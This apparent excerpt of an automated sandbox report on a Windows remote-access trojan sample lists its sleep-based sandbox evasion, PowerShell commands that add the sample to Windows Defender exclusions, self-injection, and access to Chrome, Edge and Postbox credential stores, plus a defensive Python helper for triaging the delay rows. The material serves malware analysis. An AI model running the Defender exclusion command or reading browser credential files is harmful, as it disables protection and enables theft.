Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 595813
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 595688
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 595578
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 595469
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 595344
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 595235
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 595110
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 594985
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 594860
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 594735
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 594610
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 594485
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 594360
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 594235
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 594110
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5753
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4012
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Window / User API: threadDelayed 8704
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Window / User API: threadDelayed 1119
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 2076 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5304 | Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 5880 | Thread sleep count: 8704 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 5880 | Thread sleep count: 1119 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -599657s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -599532s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -599422s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -599063s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -598938s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -598813s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -598704s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -598579s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -598454s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -598336s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -598219s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -598094s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -597985s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -596993s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -596875s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -596766s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -596641s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -596532s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -596407s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -596297s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -596188s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -596063s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -595938s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -595813s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -595688s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -595578s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -595469s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -595344s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -595235s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -595110s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -594985s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -594735s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -594610s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -594485s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -594360s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -594235s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe TID: 6164 | Thread sleep time: -594110s >= -30000s
Source: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe, 00000004.00000002.3265830469.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Memory allocated: page read and write | page guard
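Triage helper for the "Thread delayed" rows above. This is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it parses rows of the shape shown in this section (the sample rows are constructed to carry the same values), separates the 922337203685477 ms entries (Int64.MaxValue ticks / 10,000, i.e. a .NET TimeSpan.MaxValue expressed in milliseconds, which never elapses inside an analysis window) from finite delays, and recognises the 600000, 599875, 599766 ... countdown as a loop that re-sleeps the remaining time after each short wake-up. The 3-minute bar mirrors the "Contains long sleeps (>= 3 min)" signature in the overview; the countdown heuristic and its step/run parameters are our own choices.

```python
"""Triage of 'Thread delayed' rows from a Joe Sandbox behaviour listing.

Added example; the report's own tooling is not used here. Input rows are
constructed below to match the shape and values of the rows in this section.
"""
import re
from collections import defaultdict
from typing import Dict, List

# Int64.MaxValue ticks / 10,000 ticks per ms = 922337203685477: the millisecond
# value of a .NET TimeSpan.MaxValue. Read such a row as "wait forever", not as a
# duration that will ever complete in a sandbox run.
INFINITE_SENTINEL_MS = (2**63 - 1) // 10_000
LONG_SLEEP_MS = 3 * 60 * 1000  # the report's ">= 3 min" bar (assumed threshold)

# Matches both the extracted "...exeThread delayed: ..." and the cleaned
# "...exe | Thread delayed: ..." forms of a row.
_DELAY_RE = re.compile(
    r"Source:\s*(?P<image>.+?\.exe)\s*\|?\s*Thread delayed: delay time: (?P<ms>\d+)",
    re.I,
)


def parse_delays(lines: List[str]) -> Dict[str, List[int]]:
    """Group delay values (ms) by the image that issued them, preserving row order."""
    per_image: Dict[str, List[int]] = defaultdict(list)
    for line in lines:
        m = _DELAY_RE.search(line)
        if m:
            per_image[m.group("image")].append(int(m.group("ms")))
    return dict(per_image)


def is_countdown(delays: List[int], max_step_ms: int = 1000, min_run: int = 3) -> bool:
    """True if there is a run of >= min_run strictly decreasing delays separated by
    small steps: a loop that sleeps, wakes after ~100 ms, and re-sleeps the remainder."""
    run = 1
    for prev, cur in zip(delays, delays[1:]):
        if 0 < prev - cur <= max_step_ms:
            run += 1
            if run >= min_run:
                return True
        else:
            run = 1
    return False


def assess(lines: List[str]) -> Dict[str, dict]:
    """Per-image summary: infinite waits, longest finite delay, total finite delay,
    whether a countdown loop is present, and a verdict against LONG_SLEEP_MS."""
    report: Dict[str, dict] = {}
    for image, delays in parse_delays(lines).items():
        finite = [d for d in delays if d < INFINITE_SENTINEL_MS]
        infinite = len(delays) - len(finite)
        max_finite = max(finite, default=0)
        report[image] = {
            "rows": len(delays),
            "infinite_waits": infinite,
            "max_finite_ms": max_finite,
            "total_finite_ms": sum(finite),
            "countdown_loop": is_countdown(finite),
            "verdict": "long_sleep" if (infinite or max_finite >= LONG_SLEEP_MS) else "ok",
        }
    return report


# Constructed rows mirroring the first entries of the list above.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 600000",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 599875",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 599766",
    r"Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Thread delayed: delay time: 599657",
]

if __name__ == "__main__":
    for image, summary in assess(SAMPLE_LINES).items():
        print(image.rsplit("\\", 1)[-1], summary)
```

The powershell.exe row is the interesting negative control: a single infinite wait from a cmdlet host, with no countdown, still trips the long-sleep verdict, which is why the report attributes the sleep signatures to both processes.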

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3726d30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe.3706b10.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3267531741.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3264630620.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3267531741.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2031188002.0000000003706000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3267531741.00000000029C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 2924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe PID: 4040, type: MEMORYSTR
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.20281.29649.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
